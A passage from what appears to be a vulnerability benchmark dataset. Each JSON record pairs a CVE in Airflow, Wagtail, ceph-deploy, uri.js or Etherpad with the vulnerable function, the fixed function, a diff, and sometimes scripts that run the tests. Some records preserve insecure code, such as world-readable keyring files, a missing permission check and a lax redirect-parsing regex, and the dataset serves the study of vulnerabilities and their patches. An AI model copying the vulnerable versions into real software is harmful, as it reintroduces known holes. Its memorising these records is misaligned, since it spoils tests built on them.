security_manager = appbuilder.sm\n security_manager.sync_roles()\n\n from airflow.www_rbac.api.experimental import endpoints as e\n # required for testing purposes otherwise the module retains\n # a link to the default_auth\n if app.config['TESTING']:\n if six.PY2:\n reload(e) # noqa\n else:\n import importlib\n importlib.reload(e)\n\n app.register_blueprint(e.api_experimental, url_prefix='/api/experimental')\n\n server_timezone = conf.get('core', 'default_timezone')\n if server_timezone == \"system\":\n server_timezone = pendulum.local_timezone().name\n elif server_timezone == \"utc\":\n server_timezone = \"UTC\"\n\n default_ui_timezone = conf.get('webserver', 'default_ui_timezone')\n if default_ui_timezone == \"system\":\n default_ui_timezone = pendulum.local_timezone().name\n elif default_ui_timezone == \"utc\":\n default_ui_timezone = \"UTC\"\n if not default_ui_timezone:\n default_ui_timezone = server_timezone\n\n @app.context_processor\n def jinja_globals(): # pylint: disable=unused-variable\n\n globals = {\n 'server_timezone': server_timezone,\n 'default_ui_timezone': default_ui_timezone,\n 'hostname': socket.getfqdn() if conf.getboolean(\n 'webserver', 'EXPOSE_HOSTNAME', fallback=True) else 'redact',\n 'navbar_color': conf.get('webserver', 'NAVBAR_COLOR'),\n 'log_fetch_delay_sec': conf.getint(\n 'webserver', 'log_fetch_delay_sec', fallback=2),\n 'log_auto_tailing_offset': conf.getint(\n 'webserver', 'log_auto_tailing_offset', fallback=30),\n 'log_animation_speed': conf.getint(\n 'webserver', 'log_animation_speed', fallback=1000),\n 'state_color_mapping': STATE_COLORS\n }\n\n if 'analytics_tool' in conf.getsection('webserver'):\n globals.update({\n 'analytics_tool': conf.get('webserver', 'ANALYTICS_TOOL'),\n 'analytics_id': conf.get('webserver', 'ANALYTICS_ID')\n })\n\n return globals\n\n @app.teardown_appcontext\n def shutdown_session(exception=None):\n settings.Session.remove()\n\n @app.after_request\n def apply_caching(response):\n _x_frame_enabled = conf.getboolean('webserver', 'X_FRAME_ENABLED', fallback=True)\n if not _x_frame_enabled:\n response.headers[\"X-Frame-Options\"] = \"DENY\"\n return response\n\n @app.before_request\n def make_session_permanent():\n flask_session.permanent = True\n\n return app, appbuilder"}], "fix_func": [{"id": "fix_py_89_1", "commit": "a8900fa", "file_path": "airflow/www_rbac/app.py", "start_line": "51", "end_line": "286", "snippet": "def create_app(config=None, session=None, testing=False, app_name=\"Airflow\"):\n global app, appbuilder\n app = Flask(__name__)\n if conf.getboolean('webserver', 'ENABLE_PROXY_FIX'):\n app.wsgi_app = ProxyFix(\n app.wsgi_app,\n num_proxies=conf.get(\"webserver\", \"PROXY_FIX_NUM_PROXIES\", fallback=None),\n x_for=conf.getint(\"webserver\", \"PROXY_FIX_X_FOR\", fallback=1),\n x_proto=conf.getint(\"webserver\", \"PROXY_FIX_X_PROTO\", fallback=1),\n x_host=conf.getint(\"webserver\", \"PROXY_FIX_X_HOST\", fallback=1),\n x_port=conf.getint(\"webserver\", \"PROXY_FIX_X_PORT\", fallback=1),\n x_prefix=conf.getint(\"webserver\", \"PROXY_FIX_X_PREFIX\", fallback=1)\n )\n app.secret_key = conf.get('webserver', 'SECRET_KEY')\n app.config['PERMANENT_SESSION_LIFETIME'] = timedelta(minutes=settings.get_session_lifetime_config())\n\n if conf.get('webserver', 'SECRET_KEY') == \"temporary_key\":\n app.secret_key = os.urandom(16)\n else:\n app.secret_key = conf.get('webserver', 'SECRET_KEY')\n\n app.config.from_pyfile(settings.WEBSERVER_CONFIG, silent=True)\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n 
app.config['APP_NAME'] = app_name\n app.config['TESTING'] = testing\n\n app.config['SESSION_COOKIE_HTTPONLY'] = True\n app.config['SESSION_COOKIE_SECURE'] = conf.getboolean('webserver', 'COOKIE_SECURE')\n app.config['SESSION_COOKIE_SAMESITE'] = conf.get('webserver', 'COOKIE_SAMESITE')\n\n if config:\n app.config.from_mapping(config)\n\n if 'SQLALCHEMY_ENGINE_OPTIONS' not in app.config:\n app.config['SQLALCHEMY_ENGINE_OPTIONS'] = settings.prepare_engine_args()\n\n csrf.init_app(app)\n\n db = SQLA(app)\n\n from airflow import api\n api.load_auth()\n api.API_AUTH.api_auth.init_app(app)\n\n # flake8: noqa: F841\n cache = Cache(app=app, config={'CACHE_TYPE': 'filesystem', 'CACHE_DIR': '/tmp'})\n\n from airflow.www_rbac.blueprints import routes\n app.register_blueprint(routes)\n\n configure_logging()\n configure_manifest_files(app)\n\n with app.app_context():\n from airflow.www_rbac.security import AirflowSecurityManager\n security_manager_class = app.config.get('SECURITY_MANAGER_CLASS') or \\\n AirflowSecurityManager\n\n if not issubclass(security_manager_class, AirflowSecurityManager):\n raise Exception(\n \"\"\"Your CUSTOM_SECURITY_MANAGER must now extend AirflowSecurityManager,\n not FAB's security manager.\"\"\")\n\n appbuilder = AppBuilder(\n app,\n db.session if not session else session,\n security_manager_class=security_manager_class,\n base_template='airflow/master.html',\n update_perms=conf.getboolean('webserver', 'UPDATE_FAB_PERMS'))\n\n def init_views(appbuilder):\n from airflow.www_rbac import views\n # Remove the session from scoped_session registry to avoid\n # reusing a session with a disconnected connection\n appbuilder.session.remove()\n appbuilder.add_view_no_menu(views.Airflow())\n appbuilder.add_view_no_menu(views.DagModelView())\n appbuilder.add_view(views.DagRunModelView,\n \"DAG Runs\",\n category=\"Browse\",\n category_icon=\"fa-globe\")\n appbuilder.add_view(views.JobModelView,\n \"Jobs\",\n category=\"Browse\")\n appbuilder.add_view(views.LogModelView,\n \"Logs\",\n category=\"Browse\")\n appbuilder.add_view(views.SlaMissModelView,\n \"SLA Misses\",\n category=\"Browse\")\n appbuilder.add_view(views.TaskInstanceModelView,\n \"Task Instances\",\n category=\"Browse\")\n appbuilder.add_view(views.TaskRescheduleModelView,\n \"Task Reschedules\",\n category=\"Browse\")\n appbuilder.add_view(views.ConfigurationView,\n \"Configurations\",\n category=\"Admin\",\n category_icon=\"fa-user\")\n appbuilder.add_view(views.ConnectionModelView,\n \"Connections\",\n category=\"Admin\")\n appbuilder.add_view(views.PoolModelView,\n \"Pools\",\n category=\"Admin\")\n appbuilder.add_view(views.VariableModelView,\n \"Variables\",\n category=\"Admin\")\n appbuilder.add_view(views.XComModelView,\n \"XComs\",\n category=\"Admin\")\n\n if \"dev\" in version.version:\n airflow_doc_site = \"https://airflow.readthedocs.io/en/latest\"\n else:\n airflow_doc_site = 'https://airflow.apache.org/docs/{}'.format(version.version)\n\n appbuilder.add_link(\"Documentation\",\n href=airflow_doc_site,\n category=\"Docs\",\n category_icon=\"fa-cube\")\n appbuilder.add_link(\"GitHub\",\n href='https://github.com/apache/airflow',\n category=\"Docs\")\n appbuilder.add_view(views.VersionView,\n 'Version',\n category='About',\n category_icon='fa-th')\n\n def integrate_plugins():\n \"\"\"Integrate plugins to the context\"\"\"\n from airflow.plugins_manager import (\n flask_appbuilder_views, flask_appbuilder_menu_links\n )\n\n for v in flask_appbuilder_views:\n log.debug(\"Adding view %s\", v[\"name\"])\n 
appbuilder.add_view(v[\"view\"],\n v[\"name\"],\n category=v[\"category\"])\n for ml in sorted(flask_appbuilder_menu_links, key=lambda x: x[\"name\"]):\n log.debug(\"Adding menu link %s\", ml[\"name\"])\n appbuilder.add_link(ml[\"name\"],\n href=ml[\"href\"],\n category=ml[\"category\"],\n category_icon=ml[\"category_icon\"])\n\n integrate_plugins()\n # Garbage collect old permissions/views after they have been modified.\n # Otherwise, when the name of a view or menu is changed, the framework\n # will add the new Views and Menus names to the backend, but will not\n # delete the old ones.\n\n def init_plugin_blueprints(app):\n from airflow.plugins_manager import flask_blueprints\n\n for bp in flask_blueprints:\n log.debug(\"Adding blueprint %s:%s\", bp[\"name\"], bp[\"blueprint\"].import_name)\n app.register_blueprint(bp[\"blueprint\"])\n\n init_views(appbuilder)\n init_plugin_blueprints(app)\n\n if conf.getboolean('webserver', 'UPDATE_FAB_PERMS'):\n security_manager = appbuilder.sm\n security_manager.sync_roles()\n\n from airflow.www_rbac.api.experimental import endpoints as e\n # required for testing purposes otherwise the module retains\n # a link to the default_auth\n if app.config['TESTING']:\n if six.PY2:\n reload(e) # noqa\n else:\n import importlib\n importlib.reload(e)\n\n app.register_blueprint(e.api_experimental, url_prefix='/api/experimental')\n\n server_timezone = conf.get('core', 'default_timezone')\n if server_timezone == \"system\":\n server_timezone = pendulum.local_timezone().name\n elif server_timezone == \"utc\":\n server_timezone = \"UTC\"\n\n default_ui_timezone = conf.get('webserver', 'default_ui_timezone')\n if default_ui_timezone == \"system\":\n default_ui_timezone = pendulum.local_timezone().name\n elif default_ui_timezone == \"utc\":\n default_ui_timezone = \"UTC\"\n if not default_ui_timezone:\n default_ui_timezone = server_timezone\n\n @app.context_processor\n def jinja_globals(): # pylint: disable=unused-variable\n\n globals = {\n 'server_timezone': server_timezone,\n 'default_ui_timezone': default_ui_timezone,\n 'hostname': socket.getfqdn() if conf.getboolean(\n 'webserver', 'EXPOSE_HOSTNAME', fallback=True) else 'redact',\n 'navbar_color': conf.get('webserver', 'NAVBAR_COLOR'),\n 'log_fetch_delay_sec': conf.getint(\n 'webserver', 'log_fetch_delay_sec', fallback=2),\n 'log_auto_tailing_offset': conf.getint(\n 'webserver', 'log_auto_tailing_offset', fallback=30),\n 'log_animation_speed': conf.getint(\n 'webserver', 'log_animation_speed', fallback=1000),\n 'state_color_mapping': STATE_COLORS\n }\n\n if 'analytics_tool' in conf.getsection('webserver'):\n globals.update({\n 'analytics_tool': conf.get('webserver', 'ANALYTICS_TOOL'),\n 'analytics_id': conf.get('webserver', 'ANALYTICS_ID')\n })\n\n return globals\n\n @app.teardown_appcontext\n def shutdown_session(exception=None):\n settings.Session.remove()\n\n @app.after_request\n def apply_caching(response):\n _x_frame_enabled = conf.getboolean('webserver', 'X_FRAME_ENABLED', fallback=True)\n if not _x_frame_enabled:\n response.headers[\"X-Frame-Options\"] = \"DENY\"\n return response\n\n @app.before_request\n def make_session_permanent():\n flask_session.permanent = True\n\n return app, appbuilder"}], "vul_patch": "--- a/airflow/www_rbac/app.py\n+++ b/airflow/www_rbac/app.py\n@@ -14,6 +14,11 @@\n app.secret_key = conf.get('webserver', 'SECRET_KEY')\n app.config['PERMANENT_SESSION_LIFETIME'] = timedelta(minutes=settings.get_session_lifetime_config())\n \n+ if conf.get('webserver', 'SECRET_KEY') == 
\"temporary_key\":\n+ app.secret_key = os.urandom(16)\n+ else:\n+ app.secret_key = conf.get('webserver', 'SECRET_KEY')\n+\n app.config.from_pyfile(settings.WEBSERVER_CONFIG, silent=True)\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n app.config['APP_NAME'] = app_name\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-45809", "cve_description": "Wagtail is an open source content management system built on Django. A user with a limited-permission editor account for the Wagtail admin can make a direct URL request to the admin view that handles bulk actions on user accounts. While authentication rules prevent the user from making any changes, the error message discloses the display names of user accounts, and by modifying URL parameters, the user can retrieve the display name for any user. The vulnerability is not exploitable by an ordinary site visitor without access to the Wagtail admin. Patched versions have been released as Wagtail 4.1.8 (LTS), 5.0.5 and 5.1.3. The fix is also included in Release Candidate 1 of the forthcoming Wagtail 5.2 release. Users are advised to upgrade. There are no known workarounds for this vulnerability.", "cwe_info": {"CWE-532": {"name": "Insertion of Sensitive Information into Log File", "description": "The product writes sensitive information to a log file."}}, "repo": "https://github.com/wagtail/wagtail", "patch_url": ["https://github.com/wagtail/wagtail/commit/bc96aed6ac53f998b2f4c4bf97e2d4f5fe337e5b"], "programing_language": "Python", "vul_func": [{"id": "vul_py_70_1", "commit": "190af78", "file_path": "wagtail/users/views/bulk_actions/user_bulk_action.py", "start_line": 6, "end_line": 8, "snippet": "class UserBulkAction(BulkAction):\n models = [get_user_model()]"}], "fix_func": [{"id": "fix_py_70_1", "commit": "bc96aed6ac53f998b2f4c4bf97e2d4f5fe337e5b", "file_path": "wagtail/users/views/bulk_actions/user_bulk_action.py", "start_line": 8, "end_line": 14, "snippet": "User = get_user_model()\n\n\nclass UserBulkAction(PermissionCheckedMixin, BulkAction):\n models = [User]\n permission_policy = ModelPermissionPolicy(User)\n any_permission_required = [\"add\", \"change\", \"delete\"]"}], "vul_patch": "--- a/wagtail/users/views/bulk_actions/user_bulk_action.py\n+++ b/wagtail/users/views/bulk_actions/user_bulk_action.py\n@@ -1,3 +1,7 @@\n+User = get_user_model()\n \n-class UserBulkAction(BulkAction):\n- models = [get_user_model()]\n+\n+class UserBulkAction(PermissionCheckedMixin, BulkAction):\n+ models = [User]\n+ permission_policy = ModelPermissionPolicy(User)\n+ any_permission_required = [\"add\", \"change\", \"delete\"]\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2023-45809:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/wagtail\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\n/workspace/PoC_env/CVE-2023-45809/bin/python runtests.py wagtail.users.tests.test_bulk_actions.test_bulk_delete.TestUserDeleteView.test_user_permissions_required\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2023-45809:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/wagtail\ngit apply --whitespace=nowarn /workspace/fix.patch\n/workspace/PoC_env/CVE-2023-45809/bin/python runtests.py wagtail.users.tests.test_bulk_actions.test_bulk_delete\n"} {"cve_id": "CVE-2015-3010", "cve_description": "ceph-deploy before 1.5.23 uses weak permissions (644) for ceph/ceph.client.admin.keyring, which allows local users to obtain sensitive information by reading the 
file.", "cwe_info": {"CWE-200": {"name": "Exposure of Sensitive Information to an Unauthorized Actor", "description": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information."}}, "repo": "https://github.com/ceph/ceph-deploy", "patch_url": ["https://github.com/ceph/ceph-deploy/commit/eee56770393bf19ed2dd5389226c6190c08dee3f"], "programing_language": "Python", "vul_func": [{"id": "vul_py_228_1", "commit": "764d6e3", "file_path": "ceph_deploy/gatherkeys.py", "start_line": 32, "end_line": 76, "snippet": "def gatherkeys(args):\n # client.admin\n keyring = '/etc/ceph/{cluster}.client.admin.keyring'.format(\n cluster=args.cluster)\n r = fetch_file(\n args=args,\n frompath=keyring,\n topath='{cluster}.client.admin.keyring'.format(\n cluster=args.cluster),\n _hosts=args.mon,\n )\n if not r:\n raise exc.KeyNotFoundError(keyring, args.mon)\n\n # mon.\n keyring = '/var/lib/ceph/mon/{cluster}-{{hostname}}/keyring'.format(\n cluster=args.cluster)\n r = fetch_file(\n args=args,\n frompath=keyring,\n topath='{cluster}.mon.keyring'.format(cluster=args.cluster),\n _hosts=args.mon,\n )\n if not r:\n raise exc.KeyNotFoundError(keyring, args.mon)\n\n # bootstrap\n for what in ['osd', 'mds', 'rgw']:\n keyring = '/var/lib/ceph/bootstrap-{what}/{cluster}.keyring'.format(\n what=what,\n cluster=args.cluster)\n r = fetch_file(\n args=args,\n frompath=keyring,\n topath='{cluster}.bootstrap-{what}.keyring'.format(\n cluster=args.cluster,\n what=what),\n _hosts=args.mon,\n )\n if not r:\n if what in ['osd', 'mds']:\n raise exc.KeyNotFoundError(keyring, args.mon)\n else:\n LOG.warning((\"No RGW bootstrap key found. Will not be able to \"\n \"deploy RGW daemons\"))"}, {"id": "vul_py_228_2", "commit": "764d6e3", "file_path": "ceph_deploy/new.py", "start_line": 207, "end_line": 225, "snippet": "def new_mon_keyring(args):\n LOG.debug('Creating a random mon key...')\n mon_keyring = '[mon.]\\nkey = %s\\ncaps mon = allow *\\n' % generate_auth_key()\n\n keypath = '{name}.mon.keyring'.format(\n name=args.cluster,\n )\n\n LOG.debug('Writing monitor keyring to %s...', keypath)\n tmp = '%s.tmp' % keypath\n with file(tmp, 'w') as f:\n f.write(mon_keyring)\n try:\n os.rename(tmp, keypath)\n except OSError as e:\n if e.errno == errno.EEXIST:\n raise exc.ClusterExistsError(keypath)\n else:\n raise"}], "fix_func": [{"id": "fix_py_228_1", "commit": "eee5677", "file_path": "ceph_deploy/gatherkeys.py", "start_line": 32, "end_line": 80, "snippet": "def gatherkeys(args):\n oldmask = os.umask(077)\n try:\n # client.admin\n keyring = '/etc/ceph/{cluster}.client.admin.keyring'.format(\n cluster=args.cluster)\n r = fetch_file(\n args=args,\n frompath=keyring,\n topath='{cluster}.client.admin.keyring'.format(\n cluster=args.cluster),\n _hosts=args.mon,\n )\n if not r:\n raise exc.KeyNotFoundError(keyring, args.mon)\n\n # mon.\n keyring = '/var/lib/ceph/mon/{cluster}-{{hostname}}/keyring'.format(\n cluster=args.cluster)\n r = fetch_file(\n args=args,\n frompath=keyring,\n topath='{cluster}.mon.keyring'.format(cluster=args.cluster),\n _hosts=args.mon,\n )\n if not r:\n raise exc.KeyNotFoundError(keyring, args.mon)\n\n # bootstrap\n for what in ['osd', 'mds', 'rgw']:\n keyring = '/var/lib/ceph/bootstrap-{what}/{cluster}.keyring'.format(\n what=what,\n cluster=args.cluster)\n r = fetch_file(\n args=args,\n frompath=keyring,\n topath='{cluster}.bootstrap-{what}.keyring'.format(\n cluster=args.cluster,\n what=what),\n _hosts=args.mon,\n )\n if not r:\n if what in ['osd', 'mds']:\n 
raise exc.KeyNotFoundError(keyring, args.mon)\n else:\n LOG.warning((\"No RGW bootstrap key found. Will not be able to \"\n \"deploy RGW daemons\"))\n finally:\n os.umask(oldmask)"}, {"id": "fix_py_228_2", "commit": "eee5677", "file_path": "ceph_deploy/new.py", "start_line": 207, "end_line": 228, "snippet": "def new_mon_keyring(args):\n LOG.debug('Creating a random mon key...')\n mon_keyring = '[mon.]\\nkey = %s\\ncaps mon = allow *\\n' % generate_auth_key()\n\n keypath = '{name}.mon.keyring'.format(\n name=args.cluster,\n )\n oldmask = os.umask(077)\n LOG.debug('Writing monitor keyring to %s...', keypath)\n try:\n tmp = '%s.tmp' % keypath\n with open(tmp, 'w', 0600) as f:\n f.write(mon_keyring)\n try:\n os.rename(tmp, keypath)\n except OSError as e:\n if e.errno == errno.EEXIST:\n raise exc.ClusterExistsError(keypath)\n else:\n raise\n finally:\n os.umask(oldmask)"}], "vul_patch": "--- a/ceph_deploy/gatherkeys.py\n+++ b/ceph_deploy/gatherkeys.py\n@@ -1,45 +1,49 @@\n def gatherkeys(args):\n- # client.admin\n- keyring = '/etc/ceph/{cluster}.client.admin.keyring'.format(\n- cluster=args.cluster)\n- r = fetch_file(\n- args=args,\n- frompath=keyring,\n- topath='{cluster}.client.admin.keyring'.format(\n- cluster=args.cluster),\n- _hosts=args.mon,\n- )\n- if not r:\n- raise exc.KeyNotFoundError(keyring, args.mon)\n-\n- # mon.\n- keyring = '/var/lib/ceph/mon/{cluster}-{{hostname}}/keyring'.format(\n- cluster=args.cluster)\n- r = fetch_file(\n- args=args,\n- frompath=keyring,\n- topath='{cluster}.mon.keyring'.format(cluster=args.cluster),\n- _hosts=args.mon,\n- )\n- if not r:\n- raise exc.KeyNotFoundError(keyring, args.mon)\n-\n- # bootstrap\n- for what in ['osd', 'mds', 'rgw']:\n- keyring = '/var/lib/ceph/bootstrap-{what}/{cluster}.keyring'.format(\n- what=what,\n+ oldmask = os.umask(077)\n+ try:\n+ # client.admin\n+ keyring = '/etc/ceph/{cluster}.client.admin.keyring'.format(\n cluster=args.cluster)\n r = fetch_file(\n args=args,\n frompath=keyring,\n- topath='{cluster}.bootstrap-{what}.keyring'.format(\n- cluster=args.cluster,\n- what=what),\n+ topath='{cluster}.client.admin.keyring'.format(\n+ cluster=args.cluster),\n _hosts=args.mon,\n )\n if not r:\n- if what in ['osd', 'mds']:\n- raise exc.KeyNotFoundError(keyring, args.mon)\n- else:\n- LOG.warning((\"No RGW bootstrap key found. Will not be able to \"\n- \"deploy RGW daemons\"))\n+ raise exc.KeyNotFoundError(keyring, args.mon)\n+\n+ # mon.\n+ keyring = '/var/lib/ceph/mon/{cluster}-{{hostname}}/keyring'.format(\n+ cluster=args.cluster)\n+ r = fetch_file(\n+ args=args,\n+ frompath=keyring,\n+ topath='{cluster}.mon.keyring'.format(cluster=args.cluster),\n+ _hosts=args.mon,\n+ )\n+ if not r:\n+ raise exc.KeyNotFoundError(keyring, args.mon)\n+\n+ # bootstrap\n+ for what in ['osd', 'mds', 'rgw']:\n+ keyring = '/var/lib/ceph/bootstrap-{what}/{cluster}.keyring'.format(\n+ what=what,\n+ cluster=args.cluster)\n+ r = fetch_file(\n+ args=args,\n+ frompath=keyring,\n+ topath='{cluster}.bootstrap-{what}.keyring'.format(\n+ cluster=args.cluster,\n+ what=what),\n+ _hosts=args.mon,\n+ )\n+ if not r:\n+ if what in ['osd', 'mds']:\n+ raise exc.KeyNotFoundError(keyring, args.mon)\n+ else:\n+ LOG.warning((\"No RGW bootstrap key found. 
Will not be able to \"\n+ \"deploy RGW daemons\"))\n+ finally:\n+ os.umask(oldmask)\n\n--- a/ceph_deploy/new.py\n+++ b/ceph_deploy/new.py\n@@ -5,15 +5,18 @@\n keypath = '{name}.mon.keyring'.format(\n name=args.cluster,\n )\n-\n+ oldmask = os.umask(077)\n LOG.debug('Writing monitor keyring to %s...', keypath)\n- tmp = '%s.tmp' % keypath\n- with file(tmp, 'w') as f:\n- f.write(mon_keyring)\n try:\n- os.rename(tmp, keypath)\n- except OSError as e:\n- if e.errno == errno.EEXIST:\n- raise exc.ClusterExistsError(keypath)\n- else:\n- raise\n+ tmp = '%s.tmp' % keypath\n+ with open(tmp, 'w', 0600) as f:\n+ f.write(mon_keyring)\n+ try:\n+ os.rename(tmp, keypath)\n+ except OSError as e:\n+ if e.errno == errno.EEXIST:\n+ raise exc.ClusterExistsError(keypath)\n+ else:\n+ raise\n+ finally:\n+ os.umask(oldmask)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-0868", "cve_description": "Open Redirect in GitHub repository medialize/uri.js prior to 1.19.10.", "cwe_info": {"CWE-601": {"name": "URL Redirection to Untrusted Site ('Open Redirect')", "description": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect."}}, "repo": "https://github.com/medialize/uri.js", "patch_url": ["https://github.com/medialize/uri.js/commit/a8166fe02f3af6dc1b2b888dcbb807155aad9509"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_273_1", "commit": "01920b5cda87d5dd726eab43d6e7f3ce34a2fd52", "file_path": "src/URI.js", "start_line": 491, "end_line": 553, "snippet": " URI.parse = function(string, parts) {\n var pos;\n if (!parts) {\n parts = {\n preventInvalidHostname: URI.preventInvalidHostname\n };\n }\n\n string = string.replace(URI.leading_whitespace_expression, '')\n\n // [protocol\"://\"[username[\":\"password]\"@\"]hostname[\":\"port]\"/\"?][path][\"?\"querystring][\"#\"fragment]\n\n // extract fragment\n pos = string.indexOf('#');\n if (pos > -1) {\n // escaping?\n parts.fragment = string.substring(pos + 1) || null;\n string = string.substring(0, pos);\n }\n\n // extract query\n pos = string.indexOf('?');\n if (pos > -1) {\n // escaping?\n parts.query = string.substring(pos + 1) || null;\n string = string.substring(0, pos);\n }\n\n // slashes and backslashes have lost all meaning for the web protocols (https, http, wss, ws)\n string = string.replace(/^(https?|ftp|wss?)?:[/\\\\]*/i, '$1://');\n\n // extract protocol\n if (string.substring(0, 2) === '//') {\n // relative-scheme\n parts.protocol = null;\n string = string.substring(2);\n // extract \"user:pass@host:port\"\n string = URI.parseAuthority(string, parts);\n } else {\n pos = string.indexOf(':');\n if (pos > -1) {\n parts.protocol = string.substring(0, pos) || null;\n if (parts.protocol && !parts.protocol.match(URI.protocol_expression)) {\n // : may be within the path\n parts.protocol = undefined;\n } else if (string.substring(pos + 1, pos + 3).replace(/\\\\/g, '/') === '//') {\n string = string.substring(pos + 3);\n\n // extract \"user:pass@host:port\"\n string = URI.parseAuthority(string, parts);\n } else {\n string = string.substring(pos + 1);\n parts.urn = true;\n }\n }\n }\n\n // what's left must be the path\n parts.path = string;\n\n // and we're done\n return parts;\n };"}], "fix_func": [{"id": "fix_js_273_1", "commit": "a8166fe02f3af6dc1b2b888dcbb807155aad9509", "file_path": "src/URI.js", "start_line": 491, "end_line": 553, "snippet": " URI.parse = function(string, parts) {\n var pos;\n if (!parts) {\n parts = {\n preventInvalidHostname: 
URI.preventInvalidHostname\n };\n }\n\n string = string.replace(URI.leading_whitespace_expression, '')\n\n // [protocol\"://\"[username[\":\"password]\"@\"]hostname[\":\"port]\"/\"?][path][\"?\"querystring][\"#\"fragment]\n\n // extract fragment\n pos = string.indexOf('#');\n if (pos > -1) {\n // escaping?\n parts.fragment = string.substring(pos + 1) || null;\n string = string.substring(0, pos);\n }\n\n // extract query\n pos = string.indexOf('?');\n if (pos > -1) {\n // escaping?\n parts.query = string.substring(pos + 1) || null;\n string = string.substring(0, pos);\n }\n\n // slashes and backslashes have lost all meaning for the web protocols (https, http, wss, ws)\n string = string.replace(/^(https?|ftp|wss?)?:+[/\\\\]*/i, '$1://');\n\n // extract protocol\n if (string.substring(0, 2) === '//') {\n // relative-scheme\n parts.protocol = null;\n string = string.substring(2);\n // extract \"user:pass@host:port\"\n string = URI.parseAuthority(string, parts);\n } else {\n pos = string.indexOf(':');\n if (pos > -1) {\n parts.protocol = string.substring(0, pos) || null;\n if (parts.protocol && !parts.protocol.match(URI.protocol_expression)) {\n // : may be within the path\n parts.protocol = undefined;\n } else if (string.substring(pos + 1, pos + 3).replace(/\\\\/g, '/') === '//') {\n string = string.substring(pos + 3);\n\n // extract \"user:pass@host:port\"\n string = URI.parseAuthority(string, parts);\n } else {\n string = string.substring(pos + 1);\n parts.urn = true;\n }\n }\n }\n\n // what's left must be the path\n parts.path = string;\n\n // and we're done\n return parts;\n };"}], "vul_patch": "--- a/src/URI.js\n+++ b/src/URI.js\n@@ -27,7 +27,7 @@\n }\n \n // slashes and backslashes have lost all meaning for the web protocols (https, http, wss, ws)\n- string = string.replace(/^(https?|ftp|wss?)?:[/\\\\]*/i, '$1://');\n+ string = string.replace(/^(https?|ftp|wss?)?:+[/\\\\]*/i, '$1://');\n \n // extract protocol\n if (string.substring(0, 2) === '//') {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2015-2298", "cve_description": "node/utils/ExportEtherpad.js in Etherpad 1.5.x before 1.5.2 might allow remote attackers to obtain sensitive information by leveraging an improper substring check when exporting a padID.", "cwe_info": {"CWE-200": {"name": "Exposure of Sensitive Information to an Unauthorized Actor", "description": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information."}}, "repo": "https://github.com/ether/etherpad-lite", "patch_url": ["https://github.com/ether/etherpad-lite/commit/a0fb65205c7d7ff95f00eb9fd88e93b300f30c3d"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_278_1", "commit": "ec7ff3a0cac87b9319c714f792f5d39d68716c6f", "file_path": "src/node/utils/ExportEtherpad.js", "start_line": 22, "end_line": 69, "snippet": "exports.getPadRaw = function(padId, callback){\n async.waterfall([\n function(cb){\n\n // Get the Pad available content keys\n db.findKeys(\"pad:\"+padId+\"*\", null, function(err,records){\n if(!err){\n cb(err, records);\n }\n })\n },\n function(records, cb){\n var data = {};\n\n async.forEachSeries(Object.keys(records), function(key, r){\n\n // For each piece of info about a pad.\n db.get(records[key], function(err, entry){\n data[records[key]] = entry;\n\n // Get the Pad Authors\n if(entry.pool && entry.pool.numToAttrib){\n var authors = entry.pool.numToAttrib;\n async.forEachSeries(Object.keys(authors), function(k, c){\n if(authors[k][0] === 
\"author\"){\n var authorId = authors[k][1];\n\n // Get the author info\n db.get(\"globalAuthor:\"+authorId, function(e, authorEntry){\n if(authorEntry && authorEntry.padIDs) authorEntry.padIDs = padId;\n if(!e) data[\"globalAuthor:\"+authorId] = authorEntry;\n });\n\n }\n // console.log(\"authorsK\", authors[k]);\n c(null);\n });\n }\n r(null); // callback;\n });\n }, function(err){ \n cb(err, data);\n })\n }\n ], function(err, data){\n callback(null, data);\n });\n}"}], "fix_func": [{"id": "fix_js_278_1", "commit": "a0fb65205c7d7ff95f00eb9fd88e93b300f30c3d", "file_path": "src/node/utils/ExportEtherpad.js", "start_line": 22, "end_line": 79, "snippet": "exports.getPadRaw = function(padId, callback){\n async.waterfall([\n function(cb){\n\n // Get the Pad\n db.findKeys(\"pad:\"+padId, null, function(err,padcontent){\n if(!err){\n cb(err, padcontent);\n }\n })\n },\n function(padcontent,cb){\n\n // Get the Pad available content keys\n db.findKeys(\"pad:\"+padId+\":*\", null, function(err,records){\n if(!err){\n for (var key in padcontent) { records.push(padcontent[key]);}\n cb(err, records);\n }\n })\n },\n function(records, cb){\n var data = {};\n\n async.forEachSeries(Object.keys(records), function(key, r){\n\n // For each piece of info about a pad.\n db.get(records[key], function(err, entry){\n data[records[key]] = entry;\n\n // Get the Pad Authors\n if(entry.pool && entry.pool.numToAttrib){\n var authors = entry.pool.numToAttrib;\n async.forEachSeries(Object.keys(authors), function(k, c){\n if(authors[k][0] === \"author\"){\n var authorId = authors[k][1];\n\n // Get the author info\n db.get(\"globalAuthor:\"+authorId, function(e, authorEntry){\n if(authorEntry && authorEntry.padIDs) authorEntry.padIDs = padId;\n if(!e) data[\"globalAuthor:\"+authorId] = authorEntry;\n });\n\n }\n // console.log(\"authorsK\", authors[k]);\n c(null);\n });\n }\n r(null); // callback;\n });\n }, function(err){ \n cb(err, data);\n })\n }\n ], function(err, data){\n callback(null, data);\n });\n}"}], "vul_patch": "--- a/src/node/utils/ExportEtherpad.js\n+++ b/src/node/utils/ExportEtherpad.js\n@@ -2,9 +2,19 @@\n async.waterfall([\n function(cb){\n \n+ // Get the Pad\n+ db.findKeys(\"pad:\"+padId, null, function(err,padcontent){\n+ if(!err){\n+ cb(err, padcontent);\n+ }\n+ })\n+ },\n+ function(padcontent,cb){\n+\n // Get the Pad available content keys\n- 